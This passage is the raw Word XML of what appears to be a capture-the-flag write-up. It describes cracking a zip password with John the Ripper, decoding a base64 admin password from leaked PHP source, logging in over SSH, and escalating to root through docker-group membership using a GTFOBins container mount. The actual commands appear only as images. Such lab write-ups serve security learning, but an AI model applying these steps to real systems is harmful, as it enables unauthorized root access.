            <wp:docPr id="127656964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696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294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2326" w14:textId="7DF358C5" w:rsidR="00DB494C" w:rsidRDefault="00013390" w:rsidP="002D590C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">But, when I </w:t>
      </w:r>
      <w:r w:rsidR="00E813D9">
        <w:t xml:space="preserve">tried to unzip it, I needed to supply </w:t>
      </w:r>
      <w:r w:rsidR="0078383F">
        <w:t>the right</w:t>
      </w:r>
      <w:r w:rsidR="00E813D9">
        <w:t xml:space="preserve"> password.</w:t>
      </w:r>
      <w:r w:rsidR="002D590C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A225D22" w14:textId="549EFA81" w:rsidR="006151AE" w:rsidRDefault="006151AE" w:rsidP="002D590C">
      <w:r>
        <w:t xml:space="preserve">In this moment, I </w:t>
      </w:r>
      <w:r w:rsidR="003B5F49">
        <w:t xml:space="preserve">chose to </w:t>
      </w:r>
      <w:r w:rsidR="008C30F1">
        <w:t xml:space="preserve">use john the ripper and </w:t>
      </w:r>
      <w:r w:rsidR="00406E8C">
        <w:t xml:space="preserve">zip2john to </w:t>
      </w:r>
      <w:r w:rsidR="005527DC">
        <w:t xml:space="preserve">bruteforce the </w:t>
      </w:r>
      <w:r w:rsidR="009334E8">
        <w:t>password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D69F9D" w14:textId="4D5E7077" w:rsidR="009334E8" w:rsidRDefault="00095B17" w:rsidP="002D590C">
      <w:r w:rsidRPr="00095B17">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B0D5AB9" wp14:editId="0A5E4EB7">
            <wp:extent cx="7239627" cy="704911"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="208965930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593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239627" cy="7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DA8C" w14:textId="223EDD96" w:rsidR="00E03991" w:rsidRDefault="00EB49C7" w:rsidP="002D590C">
      <w:r w:rsidRPr="00EB49C7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60C776E4" wp14:editId="5F28F9E5">
            <wp:extent cx="5906012" cy="1276461"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19654745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7450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127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7627" w14:textId="595F4F56" w:rsidR="00013A85" w:rsidRDefault="00013A85" w:rsidP="002D590C">
      <w:r>
        <w:t xml:space="preserve">I found the zip password and after </w:t>
      </w:r>
      <w:r w:rsidR="00FD29AC">
        <w:t>unzipping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it</w:t>
      </w:r>
      <w:r w:rsidR="00DA1BE0">
        <w:t>, I discovered that it was a .php file</w:t>
      </w:r>
      <w:r w:rsidR="00AB469E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2E877A" w14:textId="2E437B5F" w:rsidR="002B4EF6" w:rsidRDefault="002B4EF6" w:rsidP="002D590C">
      <w:r w:rsidRPr="002B4EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE0C75F" wp14:editId="3E15CEB9">
            <wp:extent cx="2533870" cy="800169"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1675443094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43094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33870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928D" w14:textId="3E0E3505" w:rsidR="00AB469E" w:rsidRDefault="00DD7236" w:rsidP="002D590C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4214DA0E" wp14:editId="18A28DCE">
            <wp:extent cx="7556500" cy="7392035"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="116528586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858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739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72C0" w14:textId="61BFF912" w:rsidR="00393794" w:rsidRDefault="002E5EEA" w:rsidP="002D590C">
      <w:r>
        <w:t xml:space="preserve">After reading </w:t>
      </w:r>
      <w:r w:rsidR="00831D61">
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bit this code, I understood that this is the source code of the </w:t>
      </w:r>
      <w:r w:rsidR="0040579D">
        <w:t>previous version of the website</w:t>
      </w:r>
      <w:r w:rsidR="0073240F">
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:r w:rsidR="00E74869">
        <w:t xml:space="preserve">Admin portal. I found there </w:t>
      </w:r>
      <w:r w:rsidR="008A1E18">
        <w:t>is a base64</w:t>
      </w:r>
      <w:r w:rsidR="00AC037A">
        <w:t xml:space="preserve"> encryption in the if statement </w:t>
      </w:r>
      <w:r w:rsidR="00102523">
        <w:t>which represents the admin’s password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6C308B" w14:textId="5F4A8FA8" w:rsidR="00E32095" w:rsidRDefault="007F5EB8" w:rsidP="002D590C">
      <w:r w:rsidRPr="007F5EB8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A760A94" wp14:editId="2D80B4D8">
            <wp:extent cx="3905588" cy="4839119"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3736189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61892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05588" cy="48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C2C2D" w14:textId="61D45917" w:rsidR="00107D7A" w:rsidRDefault="00107D7A" w:rsidP="002D590C">
      <w:r>
        <w:t xml:space="preserve">After decrypting it, I found </w:t>
      </w:r>
      <w:r w:rsidR="00B27CC0">
        <w:t>anurodh’ s</w:t>
      </w:r>
      <w:r w:rsidR="007001B3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A127011" w14:textId="26975EAF" w:rsidR="00C06028" w:rsidRDefault="00C52A5E" w:rsidP="002D590C">
      <w:r w:rsidRPr="00C52A5E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18181E84" wp14:editId="7057779B">
            <wp:extent cx="4705758" cy="5067739"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8993315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3151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05758" cy="506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2356" w14:textId="7ADC2F0E" w:rsidR="00831D61" w:rsidRDefault="00F57FEB" w:rsidP="001D4799">
      <w:r>
        <w:t xml:space="preserve">I logged in as anurodh </w:t>
      </w:r>
      <w:r w:rsidR="00182207">
        <w:t>via ssh</w:t>
      </w:r>
      <w:r w:rsidR="00F127BA">
        <w:t xml:space="preserve"> and I investigate his directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4117E480" w14:textId="14AFEB9B" w:rsidR="001D4799" w:rsidRDefault="002D5354" w:rsidP="001D4799">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BEE54E1" wp14:editId="5AAE2905">
            <wp:extent cx="5748866" cy="413532"/>
            <wp:effectExtent l="0" t="0" r="4445" b="5715"/>
            <wp:docPr id="15123033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0330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77222" cy="41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60B48" w14:textId="77777777" w:rsidR="00B24A5F" w:rsidRDefault="002D5354" w:rsidP="001D4799">
      <w:r>
        <w:t xml:space="preserve">I run id on this </w:t>
      </w:r>
      <w:r w:rsidR="00B24A5F">
        <w:t>user,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and I found out that he is a part of the </w:t>
      </w:r>
      <w:r w:rsidR="00F763BE">
        <w:t xml:space="preserve">docker </w:t>
      </w:r>
      <w:r w:rsidR="00D33277">
        <w:t>group</w:t>
      </w:r>
      <w:r w:rsidR="00821BF2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3484E8A6" w14:textId="7978B93F" w:rsidR="00B24A5F" w:rsidRDefault="00B24A5F" w:rsidP="001D4799">
      <w:r>
        <w:t xml:space="preserve">Then, I </w:t>
      </w:r>
      <w:r w:rsidR="00115CBB">
        <w:t xml:space="preserve">went to </w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidR="00850383" w:rsidRPr="0064183E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>G</w:t>
        </w:r>
        <w:r w:rsidR="0064183E" w:rsidRPr="0064183E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>T</w:t>
        </w:r>
        <w:r w:rsidR="00850383" w:rsidRPr="0064183E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>OBins</w:t>
        </w:r>
        <w:r w:rsidR="00A97F06" w:rsidRPr="0064183E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="0064183E" w:rsidRPr="0064183E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>docker</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0064183E">
        <w:t xml:space="preserve"> page and found there this command that enable me as a privileged use (which is part of the docker group) to execute this </w:t>
      </w:r>
      <w:r w:rsidR="00873B8B">
        <w:t>command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342E6E2A" w14:textId="3EED6693" w:rsidR="002D5354" w:rsidRDefault="006B1146" w:rsidP="001D4799">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B7A44C5" wp14:editId="7802052F">
            <wp:extent cx="7556500" cy="196215"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="9416397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397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0F658" w14:textId="061F0540" w:rsidR="005027A4" w:rsidRDefault="005027A4" w:rsidP="005027A4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Short explanation: </w:t>
      </w:r>
      <w:r w:rsidR="00BF73AE">
        <w:t xml:space="preserve">this command </w:t>
      </w:r>
      <w:r w:rsidR="00707185">
        <w:t xml:space="preserve">creates a linux alpine docker </w:t>
      </w:r>
      <w:r w:rsidR="005539EE">
        <w:t>containe</w:t>
      </w:r>
      <w:r w:rsidR="0014590A">
        <w:t xml:space="preserve">r, </w:t>
      </w:r>
      <w:r w:rsidR="00FD3FC3">
        <w:t>mounts</w:t>
      </w:r>
      <w:r w:rsidR="00AA25DD">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00001610">
        <w:t xml:space="preserve">entire </w:t>
      </w:r>
      <w:r w:rsidR="00AA25DD">
        <w:t xml:space="preserve">file system of the </w:t>
      </w:r>
      <w:r w:rsidR="00096F11">
        <w:t xml:space="preserve">machine to </w:t>
      </w:r>
      <w:r w:rsidR="000C4674">
        <w:t xml:space="preserve">the container’s </w:t>
      </w:r>
      <w:r w:rsidR="004338C4">
        <w:t xml:space="preserve">file system </w:t>
      </w:r>
      <w:r w:rsidR="000F544A">
        <w:t>and execute</w:t>
      </w:r>
      <w:r w:rsidR="007E51A0">
        <w:t xml:space="preserve">s a terminal </w:t>
      </w:r>
      <w:r w:rsidR="000A7B67">
        <w:t>inside it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E4CB32" w14:textId="0BD93A01" w:rsidR="006D29E7" w:rsidRDefault="006D29E7" w:rsidP="001D4799">
      <w:r w:rsidRPr="006D29E7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2792EC5E" wp14:editId="4A8287DF">
            <wp:extent cx="7171041" cy="666808"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6298130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81304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171041" cy="6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4EB47" w14:textId="1A57FD9F" w:rsidR="00492BA1" w:rsidRDefault="00492BA1" w:rsidP="001D4799">
      <w:r>
        <w:t xml:space="preserve">And by doing so I got root </w:t>
      </w:r>
      <w:r w:rsidR="00D32365">
        <w:t xml:space="preserve">privileges. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35137A6B" w14:textId="703179AF" w:rsidR="00A26A2D" w:rsidRDefault="00B14024" w:rsidP="001D4799">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35162569" wp14:editId="60F0C95A">
            <wp:extent cx="7556500" cy="4979035"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="48673114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311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B0BA0" w14:textId="7A4E9BD4" w:rsidR="001C262A" w:rsidRDefault="001C262A" w:rsidP="001D4799">
      <w:r>
        <w:t>And all that left was to navigated to the root directory and take the root’s flag!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001C262A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E91A73"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D30E4CD4"/>
    <w:lvl w:ilvl="0" w:tplc="E8B026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8060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240"/>
    <w:rsid w:val="00001610"/>
    <w:rsid w:val="00013390"/>
    <w:rsid w:val="00013A85"/>
    <w:rsid w:val="00016168"/>
    <w:rsid w:val="00016FA5"/>
    <w:rsid w:val="000179CD"/>
    <w:rsid w:val="00017B32"/>
    <w:rsid w:val="00024D77"/>
    <w:rsid w:val="000260AA"/>
    <w:rsid w:val="00026ED4"/>
    <w:rsid w:val="00045947"/>
    <w:rsid w:val="00054D5A"/>
    <w:rsid w:val="00055CD2"/>
    <w:rsid w:val="00064DE9"/>
    <w:rsid w:val="00066D40"/>
    <w:rsid w:val="000702A8"/>
    <w:rsid w:val="000717E8"/>
    <w:rsid w:val="00071AD9"/>
    <w:rsid w:val="00073064"/>
    <w:rsid w:val="00073500"/>
    <w:rsid w:val="000775AB"/>
    <w:rsid w:val="00086D61"/>
    <w:rsid w:val="000930D4"/>
    <w:rsid w:val="00095B17"/>
    <w:rsid w:val="00096F11"/>
    <w:rsid w:val="000A4C12"/>
    <w:rsid w:val="000A7B67"/>
    <w:rsid w:val="000C2DB5"/>
    <w:rsid w:val="000C3685"/>
    <w:rsid w:val="000C4674"/>
    <w:rsid w:val="000C6DF1"/>
    <w:rsid w:val="000D5363"/>
    <w:rsid w:val="000D5EEF"/>
    <w:rsid w:val="000D7F7A"/>
    <w:rsid w:val="000E6172"/>
    <w:rsid w:val="000F3198"/>
    <w:rsid w:val="000F38F3"/>
    <w:rsid w:val="000F5126"/>
    <w:rsid w:val="000F544A"/>
    <w:rsid w:val="00101524"/>
    <w:rsid w:val="00102523"/>
    <w:rsid w:val="00107D7A"/>
    <w:rsid w:val="0011405C"/>
    <w:rsid w:val="00115CBB"/>
    <w:rsid w:val="001261FC"/>
    <w:rsid w:val="00131C4B"/>
    <w:rsid w:val="00133E15"/>
    <w:rsid w:val="00137489"/>
    <w:rsid w:val="0014590A"/>
    <w:rsid w:val="0015384B"/>
    <w:rsid w:val="001540A0"/>
    <w:rsid w:val="00167EAA"/>
    <w:rsid w:val="001726EA"/>
    <w:rsid w:val="00172A8E"/>
    <w:rsid w:val="001735ED"/>
    <w:rsid w:val="00174DDD"/>
    <w:rsid w:val="00182207"/>
    <w:rsid w:val="00183E71"/>
    <w:rsid w:val="00184F46"/>
    <w:rsid w:val="00186661"/>
    <w:rsid w:val="0019140F"/>
    <w:rsid w:val="001955EA"/>
    <w:rsid w:val="00195A74"/>
    <w:rsid w:val="001963B3"/>
    <w:rsid w:val="001A5A58"/>
    <w:rsid w:val="001A5CEE"/>
    <w:rsid w:val="001B0CBF"/>
    <w:rsid w:val="001B16EC"/>
    <w:rsid w:val="001B301E"/>
    <w:rsid w:val="001B34EF"/>
    <w:rsid w:val="001B41D3"/>
    <w:rsid w:val="001C262A"/>
    <w:rsid w:val="001D05CE"/>
    <w:rsid w:val="001D134A"/>
    <w:rsid w:val="001D4799"/>
    <w:rsid w:val="001D4AFC"/>
    <w:rsid w:val="001E2815"/>
    <w:rsid w:val="001E3663"/>
    <w:rsid w:val="00202E09"/>
    <w:rsid w:val="00205464"/>
    <w:rsid w:val="00206322"/>
    <w:rsid w:val="002065C3"/>
    <w:rsid w:val="00207C56"/>
    <w:rsid w:val="002135F5"/>
    <w:rsid w:val="0021502D"/>
    <w:rsid w:val="002222DE"/>
    <w:rsid w:val="00223039"/>
    <w:rsid w:val="00227117"/>
    <w:rsid w:val="00235A3C"/>
    <w:rsid w:val="002421B6"/>
    <w:rsid w:val="002456F2"/>
    <w:rsid w:val="00245CE1"/>
    <w:rsid w:val="00250999"/>
    <w:rsid w:val="00253D9F"/>
    <w:rsid w:val="002550DA"/>
    <w:rsid w:val="002631F0"/>
    <w:rsid w:val="002667AD"/>
    <w:rsid w:val="00270392"/>
    <w:rsid w:val="0027482F"/>
    <w:rsid w:val="00275B60"/>
    <w:rsid w:val="0027734B"/>
    <w:rsid w:val="00277BCA"/>
    <w:rsid w:val="0028417F"/>
    <w:rsid w:val="00286520"/>
    <w:rsid w:val="0029022E"/>
    <w:rsid w:val="00291A08"/>
    <w:rsid w:val="002926DE"/>
    <w:rsid w:val="002A2DC7"/>
    <w:rsid w:val="002A5600"/>
    <w:rsid w:val="002B4EF6"/>
    <w:rsid w:val="002C06DE"/>
    <w:rsid w:val="002C0EBF"/>
    <w:rsid w:val="002C59D3"/>
    <w:rsid w:val="002D09E5"/>
    <w:rsid w:val="002D29FF"/>
    <w:rsid w:val="002D5354"/>
    <w:rsid w:val="002D590C"/>
    <w:rsid w:val="002D6C18"/>
    <w:rsid w:val="002E265E"/>
    <w:rsid w:val="002E5B28"/>
    <w:rsid w:val="002E5EEA"/>
    <w:rsid w:val="002E6A37"/>
    <w:rsid w:val="002F030F"/>
    <w:rsid w:val="00305D1B"/>
    <w:rsid w:val="0031118F"/>
    <w:rsid w:val="003128AD"/>
    <w:rsid w:val="003310A4"/>
    <w:rsid w:val="003410E4"/>
    <w:rsid w:val="00344E6C"/>
    <w:rsid w:val="003458EB"/>
    <w:rsid w:val="00351333"/>
    <w:rsid w:val="00360128"/>
    <w:rsid w:val="00360CF6"/>
    <w:rsid w:val="003665FD"/>
    <w:rsid w:val="00373463"/>
    <w:rsid w:val="00376647"/>
    <w:rsid w:val="003847D2"/>
    <w:rsid w:val="00386B3C"/>
    <w:rsid w:val="00390EBD"/>
    <w:rsid w:val="00392889"/>
    <w:rsid w:val="00392CC1"/>
    <w:rsid w:val="00393794"/>
    <w:rsid w:val="00395E7C"/>
    <w:rsid w:val="00397279"/>
    <w:rsid w:val="003B106E"/>
    <w:rsid w:val="003B2614"/>
    <w:rsid w:val="003B4209"/>
    <w:rsid w:val="003B5F49"/>
    <w:rsid w:val="003B7864"/>
    <w:rsid w:val="003C4700"/>
    <w:rsid w:val="003C6F59"/>
    <w:rsid w:val="003C70E9"/>
    <w:rsid w:val="003E44E6"/>
    <w:rsid w:val="003F1E2C"/>
    <w:rsid w:val="0040579D"/>
    <w:rsid w:val="00406E8C"/>
    <w:rsid w:val="00410CD2"/>
    <w:rsid w:val="004113E7"/>
    <w:rsid w:val="00417900"/>
    <w:rsid w:val="00420596"/>
    <w:rsid w:val="00420C28"/>
    <w:rsid w:val="00432F0C"/>
    <w:rsid w:val="004338C4"/>
    <w:rsid w:val="00434D89"/>
    <w:rsid w:val="00435371"/>
    <w:rsid w:val="00436D19"/>
    <w:rsid w:val="004370BF"/>
    <w:rsid w:val="0045252B"/>
    <w:rsid w:val="00455B21"/>
    <w:rsid w:val="00464FF2"/>
    <w:rsid w:val="00466F01"/>
    <w:rsid w:val="004702EC"/>
    <w:rsid w:val="004732E7"/>
    <w:rsid w:val="00473FD5"/>
    <w:rsid w:val="004749F4"/>
    <w:rsid w:val="0047763A"/>
    <w:rsid w:val="00485F0D"/>
    <w:rsid w:val="00492BA1"/>
    <w:rsid w:val="00493C86"/>
    <w:rsid w:val="00494C30"/>
    <w:rsid w:val="00497085"/>
    <w:rsid w:val="004A0730"/>
    <w:rsid w:val="004B641B"/>
    <w:rsid w:val="004B774C"/>
    <w:rsid w:val="004C2795"/>
    <w:rsid w:val="004C6743"/>
    <w:rsid w:val="004C7B50"/>
    <w:rsid w:val="004E0147"/>
    <w:rsid w:val="004E3240"/>
    <w:rsid w:val="004E41E7"/>
    <w:rsid w:val="004E4519"/>
    <w:rsid w:val="004F1543"/>
    <w:rsid w:val="004F5038"/>
    <w:rsid w:val="005009E0"/>
    <w:rsid w:val="005027A4"/>
    <w:rsid w:val="00504481"/>
    <w:rsid w:val="00514242"/>
    <w:rsid w:val="00514EE4"/>
    <w:rsid w:val="00520B04"/>
    <w:rsid w:val="00521F75"/>
    <w:rsid w:val="005228A2"/>
    <w:rsid w:val="00530ECF"/>
    <w:rsid w:val="005322A8"/>
    <w:rsid w:val="00536F86"/>
    <w:rsid w:val="00537B1B"/>
    <w:rsid w:val="005412CB"/>
    <w:rsid w:val="005450BA"/>
    <w:rsid w:val="00547064"/>
    <w:rsid w:val="005527DC"/>
    <w:rsid w:val="005539EE"/>
    <w:rsid w:val="00556CF5"/>
    <w:rsid w:val="00556D0E"/>
    <w:rsid w:val="00562523"/>
    <w:rsid w:val="005655FE"/>
    <w:rsid w:val="00581E79"/>
    <w:rsid w:val="005843C0"/>
    <w:rsid w:val="005859A9"/>
    <w:rsid w:val="00591068"/>
    <w:rsid w:val="00592062"/>
    <w:rsid w:val="005A3EBE"/>
    <w:rsid w:val="005B0FA6"/>
    <w:rsid w:val="005B53A0"/>
    <w:rsid w:val="005B6548"/>
    <w:rsid w:val="005C4945"/>
    <w:rsid w:val="005C647E"/>
    <w:rsid w:val="005C76D3"/>
    <w:rsid w:val="005D3A87"/>
    <w:rsid w:val="00605275"/>
    <w:rsid w:val="006063D1"/>
    <w:rsid w:val="0060799B"/>
    <w:rsid w:val="006151AE"/>
    <w:rsid w:val="006212C3"/>
    <w:rsid w:val="00621342"/>
    <w:rsid w:val="00626C83"/>
    <w:rsid w:val="00630DDA"/>
    <w:rsid w:val="0063783A"/>
    <w:rsid w:val="00637C76"/>
    <w:rsid w:val="0064183E"/>
    <w:rsid w:val="00652CF4"/>
    <w:rsid w:val="006547E7"/>
    <w:rsid w:val="00665A04"/>
    <w:rsid w:val="006712B7"/>
    <w:rsid w:val="00691C90"/>
    <w:rsid w:val="00696490"/>
    <w:rsid w:val="0069794D"/>
    <w:rsid w:val="006A1C0F"/>
    <w:rsid w:val="006B1146"/>
    <w:rsid w:val="006B2AC2"/>
    <w:rsid w:val="006B7294"/>
    <w:rsid w:val="006C0271"/>
    <w:rsid w:val="006C0933"/>
    <w:rsid w:val="006C2C0C"/>
    <w:rsid w:val="006C3183"/>
    <w:rsid w:val="006C6558"/>
    <w:rsid w:val="006C76A0"/>
    <w:rsid w:val="006D29E7"/>
    <w:rsid w:val="006D6C5D"/>
    <w:rsid w:val="006E2544"/>
    <w:rsid w:val="006E4F0E"/>
    <w:rsid w:val="006E7B61"/>
    <w:rsid w:val="006F6239"/>
    <w:rsid w:val="006F6391"/>
    <w:rsid w:val="006F693B"/>
    <w:rsid w:val="006F76BB"/>
    <w:rsid w:val="007001B3"/>
    <w:rsid w:val="007045BC"/>
    <w:rsid w:val="00707185"/>
    <w:rsid w:val="00711F4B"/>
    <w:rsid w:val="0071496A"/>
    <w:rsid w:val="00716951"/>
    <w:rsid w:val="0073240F"/>
    <w:rsid w:val="00734E96"/>
    <w:rsid w:val="00735735"/>
    <w:rsid w:val="00737FBF"/>
    <w:rsid w:val="007451C9"/>
    <w:rsid w:val="00745E67"/>
    <w:rsid w:val="00747A6D"/>
    <w:rsid w:val="007520CF"/>
    <w:rsid w:val="00753708"/>
    <w:rsid w:val="00760F83"/>
    <w:rsid w:val="00763D18"/>
    <w:rsid w:val="00774434"/>
    <w:rsid w:val="007766EF"/>
    <w:rsid w:val="007772B9"/>
    <w:rsid w:val="0078383F"/>
    <w:rsid w:val="00785038"/>
    <w:rsid w:val="00792C25"/>
    <w:rsid w:val="00794551"/>
    <w:rsid w:val="00794604"/>
    <w:rsid w:val="007A33A3"/>
    <w:rsid w:val="007B207A"/>
    <w:rsid w:val="007B3EB5"/>
    <w:rsid w:val="007B53B3"/>
    <w:rsid w:val="007B68D5"/>
    <w:rsid w:val="007C2899"/>
    <w:rsid w:val="007D5FAD"/>
    <w:rsid w:val="007D7864"/>
    <w:rsid w:val="007E2752"/>
    <w:rsid w:val="007E51A0"/>
    <w:rsid w:val="007F0D88"/>
    <w:rsid w:val="007F25E0"/>
    <w:rsid w:val="007F3A83"/>
    <w:rsid w:val="007F484D"/>
    <w:rsid w:val="007F5EB8"/>
    <w:rsid w:val="007F7221"/>
    <w:rsid w:val="007F7A3E"/>
    <w:rsid w:val="007F7DB1"/>
    <w:rsid w:val="008022DE"/>
    <w:rsid w:val="00817B46"/>
    <w:rsid w:val="00821BF2"/>
    <w:rsid w:val="00827010"/>
    <w:rsid w:val="008305DD"/>
    <w:rsid w:val="00831615"/>
    <w:rsid w:val="00831D61"/>
    <w:rsid w:val="00832A24"/>
    <w:rsid w:val="00833BF8"/>
    <w:rsid w:val="00837391"/>
    <w:rsid w:val="0083743A"/>
    <w:rsid w:val="00844D1E"/>
    <w:rsid w:val="00850383"/>
    <w:rsid w:val="00852FC2"/>
    <w:rsid w:val="00854455"/>
    <w:rsid w:val="00856D43"/>
    <w:rsid w:val="00863A06"/>
    <w:rsid w:val="0086486F"/>
    <w:rsid w:val="00864904"/>
    <w:rsid w:val="00873B8B"/>
    <w:rsid w:val="008847F9"/>
    <w:rsid w:val="00886A09"/>
    <w:rsid w:val="008921D4"/>
    <w:rsid w:val="008A1420"/>
    <w:rsid w:val="008A1E18"/>
    <w:rsid w:val="008C30F1"/>
    <w:rsid w:val="008C5537"/>
    <w:rsid w:val="008C5A7D"/>
    <w:rsid w:val="008C76E6"/>
    <w:rsid w:val="008D376F"/>
    <w:rsid w:val="008E0565"/>
    <w:rsid w:val="008E2D54"/>
    <w:rsid w:val="008E45AC"/>
    <w:rsid w:val="008E6568"/>
    <w:rsid w:val="008E6880"/>
    <w:rsid w:val="008E6A18"/>
    <w:rsid w:val="008E6B0F"/>
    <w:rsid w:val="008F01CC"/>
    <w:rsid w:val="008F039C"/>
    <w:rsid w:val="00906597"/>
    <w:rsid w:val="00906F4B"/>
    <w:rsid w:val="0091310D"/>
    <w:rsid w:val="00916411"/>
    <w:rsid w:val="00916F62"/>
    <w:rsid w:val="00920BB4"/>
    <w:rsid w:val="00925E5A"/>
    <w:rsid w:val="00927207"/>
    <w:rsid w:val="00930B0F"/>
    <w:rsid w:val="009334E8"/>
    <w:rsid w:val="00935F79"/>
    <w:rsid w:val="009360D4"/>
    <w:rsid w:val="00950A56"/>
    <w:rsid w:val="009543F7"/>
    <w:rsid w:val="009567D2"/>
    <w:rsid w:val="0096019A"/>
    <w:rsid w:val="00962389"/>
    <w:rsid w:val="0097303E"/>
    <w:rsid w:val="00973493"/>
    <w:rsid w:val="009735AA"/>
    <w:rsid w:val="00976504"/>
    <w:rsid w:val="00997924"/>
    <w:rsid w:val="009A5273"/>
    <w:rsid w:val="009B5228"/>
    <w:rsid w:val="009B7C0D"/>
    <w:rsid w:val="009B7F31"/>
    <w:rsid w:val="009C0816"/>
    <w:rsid w:val="009C233E"/>
    <w:rsid w:val="009C3CDC"/>
    <w:rsid w:val="009C4B7F"/>
    <w:rsid w:val="009C7FE3"/>
    <w:rsid w:val="009D5B8C"/>
    <w:rsid w:val="009E3B59"/>
    <w:rsid w:val="009F31BA"/>
    <w:rsid w:val="009F70B0"/>
    <w:rsid w:val="009F78BA"/>
    <w:rsid w:val="00A00D8D"/>
    <w:rsid w:val="00A0225E"/>
    <w:rsid w:val="00A029BB"/>
    <w:rsid w:val="00A111CC"/>
    <w:rsid w:val="00A13CED"/>
    <w:rsid w:val="00A17845"/>
    <w:rsid w:val="00A243D0"/>
    <w:rsid w:val="00A25A4B"/>
    <w:rsid w:val="00A26A2D"/>
    <w:rsid w:val="00A26B7E"/>
    <w:rsid w:val="00A30257"/>
    <w:rsid w:val="00A349B4"/>
    <w:rsid w:val="00A46FA3"/>
    <w:rsid w:val="00A55ADE"/>
    <w:rsid w:val="00A7075F"/>
    <w:rsid w:val="00A7130A"/>
    <w:rsid w:val="00A77689"/>
    <w:rsid w:val="00A82E5B"/>
    <w:rsid w:val="00A8554C"/>
    <w:rsid w:val="00A90E18"/>
    <w:rsid w:val="00A91347"/>
    <w:rsid w:val="00A93503"/>
    <w:rsid w:val="00A97F06"/>
    <w:rsid w:val="00AA0586"/>
    <w:rsid w:val="00AA25DD"/>
    <w:rsid w:val="00AA2662"/>
    <w:rsid w:val="00AB469E"/>
    <w:rsid w:val="00AB546E"/>
    <w:rsid w:val="00AC037A"/>
    <w:rsid w:val="00AC4D5E"/>
    <w:rsid w:val="00AC4F9D"/>
    <w:rsid w:val="00AC685B"/>
    <w:rsid w:val="00AD6896"/>
    <w:rsid w:val="00AE10F8"/>
    <w:rsid w:val="00B04AF9"/>
    <w:rsid w:val="00B059E9"/>
    <w:rsid w:val="00B14024"/>
    <w:rsid w:val="00B15FC3"/>
    <w:rsid w:val="00B211DF"/>
    <w:rsid w:val="00B235DF"/>
    <w:rsid w:val="00B24A5F"/>
    <w:rsid w:val="00B27CC0"/>
    <w:rsid w:val="00B307A1"/>
    <w:rsid w:val="00B36B12"/>
    <w:rsid w:val="00B5506D"/>
    <w:rsid w:val="00B61CDD"/>
    <w:rsid w:val="00B754CC"/>
